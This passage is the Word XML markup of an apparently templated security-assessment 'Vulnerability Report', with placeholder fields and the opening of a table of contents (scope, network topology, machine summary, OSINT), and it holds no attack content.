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du wp14">
  <w:body>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000001" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000002" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000003" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000004" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000005" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000006" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000007" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000008" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000009" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="0000000A" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="0000000B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a"/>
        <w:tblW w:w="9039" w:type="dxa"/>
        <w:tblInd w:w="73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00" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9039"/>
      </w:tblGrid>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="2FB621C9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9039" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:color="2E74B5" w:themeColor="accent5" w:themeShade="BF" w:sz="18" w:space="0"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000000C" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{name}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="793ADF3A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9039" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:color="2E74B5" w:themeColor="accent5" w:themeShade="BF" w:sz="18" w:space="0"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000000D" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="Title"/>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>Vulnerability Report CONFIDENTIAL DO NOT DISTRIBUTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="6292B1A6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9039" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:color="2E74B5" w:themeColor="accent5" w:themeShade="BF" w:sz="18" w:space="0"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000000E" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="Title"/>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">date | </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>convertDateLocale</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>: 'us': 'full'</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="0000000F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000010" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000011" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Proofread: {name}, RAKMS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000012" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>{%</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>company.logo</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000013" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="00000014" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000015" w14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="595959" w:sz="24" w:space="1"/>
          <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
          <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
          <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
          <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="240"/>
        <w:ind w:right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:smallCaps w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:smallCaps w:val="1"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:id w:val="-277420942"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00352154" w:rsidRDefault="0085413F" w14:paraId="404F92C8" w14:textId="292086B9">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \h \u \z \t "Heading 1,1,Heading 2,2,Heading 3,3,Heading 5,5,Heading 6,6,"</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:history="1" w:anchor="_Toc180645180">
            <w:r w:rsidRPr="008F144B" w:rsidR="00352154">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1 {name} Summary and Contact Information</w:t>
            </w:r>
            <w:r w:rsidR="00352154">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00352154">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00352154">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645180 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00352154">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00352154">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00352154">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00352154">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="47BEC711" w14:textId="37C4B583">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645181">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 Contact Information</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645181 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="7CE7AACB" w14:textId="17300348">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645182">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 Timeline</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645182 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="5E9022DC" w14:textId="19121B42">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645183">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3 Team Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645183 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="5A96282A" w14:textId="4C0C92D7">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645184">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2 Executive Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645184 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="4D8FAFB8" w14:textId="286E5B13">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645185">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3 Engagement Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645185 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="1C55053B" w14:textId="332D0BEE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645186">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Scope</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645186 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="04B664AE" w14:textId="267406BA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645187">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Network Topology</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645187 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="64411C2F" w14:textId="3A7DAD4A">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645188">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="IBM Plex Sans"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1 Machine Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645188 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="30E32106" w14:textId="315F50FF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645189">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Open Source Intelligence (OSINT)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645189 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
